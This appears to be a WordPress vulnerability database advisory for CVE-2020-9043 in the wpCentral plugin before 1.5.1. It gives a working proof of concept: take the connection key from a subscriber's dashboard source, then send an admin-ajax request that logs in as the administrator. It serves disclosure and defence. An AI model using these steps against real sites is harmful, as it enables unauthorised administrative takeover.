wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation



Description
"The flaw allowed anybody to escalate their privileges to those of an administrator, as long as subscriber-level registration was enabled on a given WordPress site with the vulnerable plugin installed."
Proof of Concept
1. Log in as Subscriber.
2. Scrape the page (/wp-admin/index.php) for the connection key. (i.e. view source and search for "Connection Key") Copy the key.

Excerpt:
<div style="text-align:center; font-weight:bold;"><p style="margin-bottom: 4px;margin-top: 20px;">wpCentral Connection Key</p></div>
		<div style="padding: 10px;background-color: #fafafa;border: 1px solid black;border-radius: 10px;font-weight: bold;font-size: 14px;text-align: center;">lsgp0jlf3hjnaudtozswglpdva4xodnd94hcu5qb81dzdpt4y3iagwerwbwukmcw78g2dihphluqxagvo7dmm0igxamp2cw58jan0jvjhmv7dh953ububhnuimkgnmlk</div>
	</div><script type="text/javascript">

Extracted key:
lsgp0jlf3hjnaudtozswglpdva4xodnd94hcu5qb81dzdpt4y3iagwerwbwukmcw78g2dihphluqxagvo7dmm0igxamp2cw58jan0jvjhmv7dh953ububhnuimkgnmlk
Log out.
3. Send the following request with the connection key pasted where it says "Auth_key_here" /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key=[AUTH_KEY_HERE]
4. Should now be logged in as user 1 -- presumably administrative user.

Affects Plugin

fixed in version 1.5.1

References

CVE 2020-9043
URL https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/

Classification

Type PRIVESC
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-269

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://wordfence.com
Submitter Twitter infosecchloe
Views 4023
Verified No
WPVDB ID 10074

Timeline

Publicly Published 2020-02-17 (about 2 months ago)
Added 2020-02-17 (about 1 month ago)
Last Updated 2020-02-18 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin